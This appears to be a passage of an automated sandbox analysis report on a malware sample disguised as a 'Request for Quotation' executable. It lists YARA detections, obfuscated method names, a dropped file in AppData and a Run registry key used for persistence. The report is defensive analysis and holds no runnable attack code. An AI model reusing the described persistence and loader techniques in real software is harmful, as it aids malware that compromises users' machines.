                    Source: 0.2.Request for Quotation-537262227-04.exe.61e0000.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Request for Quotation-537262227-04.exe.61e0000.9.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Request for Quotation-537262227-04.exe.61e0000.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Request for Quotation-537262227-04.exe.61e0000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Request for Quotation-537262227-04.exe.61e0000.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.Request for Quotation-537262227-04.exe.62b0000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2322212414.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2176781654.00000000062B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2426055475.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2156575448.000000000280A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Request for Quotation-537262227-04.exe PID: 6160, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 2516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Oltpxw.exe PID: 1524, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_061B2EA7 push esp; retf 0_2_061B2EA8
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637FC5B pushfd ; ret 0_2_0637FC61
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637D150 push es; retf 0_2_0637D170
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637D186 push es; retf 0_2_0637D188
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637D1E6 push es; retf 0_2_0637D1F0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637D1D6 pushad ; iretd 0_2_0637D1D9
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_064162C8 pushad ; iretd 0_2_064162C9
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_06417DA8 pushad ; iretd 0_2_06417DA9
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_06676900 push ebx; retf 0_2_0667690A
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063D7E5A push es; iretd 4_2_063D8044
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063D7E5A push es; ret 4_2_063D8068
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_063D7FB2 push es; ret 4_2_063D8068
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06513D11 push es; ret 4_2_06513D20
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0651D1D6 pushad ; iretd 4_2_0651D1D9
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0651D1E6 push es; retf 4_2_0651D1F0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0651D186 push es; retf 4_2_0651D188
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065365AD push es; retf 4_2_065365B0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0653621D push es; ret 4_2_0653630C
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06536232 push es; ret 4_2_0653630C
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06569F29 push es; ret 4_2_06569F3C
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_0658283C push es; iretd 4_2_06582884
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06582885 push es; retf 4_2_06582894
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065B62C8 pushad ; iretd 4_2_065B62C9
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_065B7DA8 pushad ; iretd 4_2_065B7DA9
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_068168FF push ebx; retf 4_2_0681690A
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06827ED3 push es; ret 6_2_06827ED4
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06827ED7 push es; iretd 6_2_06827ED8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06827FA7 push es; iretd 6_2_06827FA8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_06828063 push es; ret 6_2_06828068
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0696D186 push es; retf 6_2_0696D188
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_0696D1D6 pushad ; iretd 6_2_0696D1D9
                    Source: 0.2.Request for Quotation-537262227-04.exe.60a0000.8.raw.unpack, fpQJWToGvSqeWdof0AL.csHigh entropy of concatenated method names: 'ufpokfC0QJ', 'zganAIlNUGCHV4ImkDN', 'r8Q5sdlnYJPVT5eWiAN', 'b6EOiGlFTHqhhVRITub', 'bFgLRMlxmLD7cqxomsR', 'yKvZy1l5f5tNSuMag3g', 'foXo7rlEFgttwit5hwD'
                    Source: 0.2.Request for Quotation-537262227-04.exe.60a0000.8.raw.unpack, n9r7fS8MhLvPSIQvXiL.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'wCk8Q3SVKk', 'NtProtectVirtualMemory', 'KCuAN6XyJQBHVG8kJmu', 'PARBM7XsoBe6OFQNoqn', 'uoyGcLXZhgPrSwkjoPe', 'hX439PXuNRxKBq89Giu'
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeFile created: C:\Users\user\AppData\Roaming\Oltpxw.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OltpxwJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OltpxwJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
